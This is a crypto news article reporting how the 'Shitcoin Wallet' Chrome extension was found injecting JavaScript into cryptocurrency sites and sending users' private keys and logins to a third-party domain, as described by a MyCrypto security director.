Join Our Telegram channel to stay up to date on breaking news coverage
Recently, an extension in Google Chrome has been caught injecting malicious JavaScript code on web pages. This code allows the extension to steal various passwords and private keys from the internet user’s Bitcoin wallets and cryptocurrency portals.
Badly Named with Bad Intents
The extension is rather tastelessly named Shitcoin Wallet, holding an extension ID of ckkgmccefffnbbalkmbbgebbojjogffn. The extension launched last month, or rather last year, on the 9th of December, 2019.
The introductory blog post to this extension, the group behind it describes Shitcoin Wallet as a wallet that allows users to buy Ethereum coins and manage properly. Coupled with this, Shitcoin Wallet allows for ERC20-based tokens as well, the kind of tokens usually doled out by way of Initial Coin Offerings or ICOs.
Very Convenient, But Tarnished
This Chrome extension, if it were only benign, served an instrumental purpose. Users could install the extension and manage both ETH and its ERC-20 coins within their own web browser. Furthermore, users are capable of installing a desktop app for Windows should they wish to manage their funds outside the bounds of a browser’s higher-risk environment.
Things started to fall apart afterward, with Harry Denley being the instigator of the collapse. Denley is the Director of Security at the MyCrypto platform and discovered that the extension held malicious code inside it. It seems nothing can just be for the good of all humanity.
Denley explained that the extension was dangerous in two significant ways. The first was that any form of funds that were managed directly within the extension was at risk. This is due to the extension sending the private keys of any, and all wallets managed or created within its interface to a third party website, located at the address erc20wallet[.]tk.
The second key issue is its active code injection of Javascript code whenever a user navigates to five popular and well-known cryptocurrency management platforms. With the malicious code injected, the extension steals the private keys and login details of those platforms as well, sending it to the same third-party website.
Step By Step
A detailed analysis of the code shows the process, step-by-step. First, the user installs the extension, which then requests permission to inject more JavaScript code on 77 websites. When one of these 77 websites are accessed, the extension loads then injects another JavaScript File from https://erc20wallet[.]tk/js/content_.js. This file contains obfuscated code that activates on five other websites: MyEtherWallet.com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange. This code, in turn, logs private keys and login information that a user creates, sending it to the third-party website.
Join Our Telegram channel to stay up to date on breaking news coverage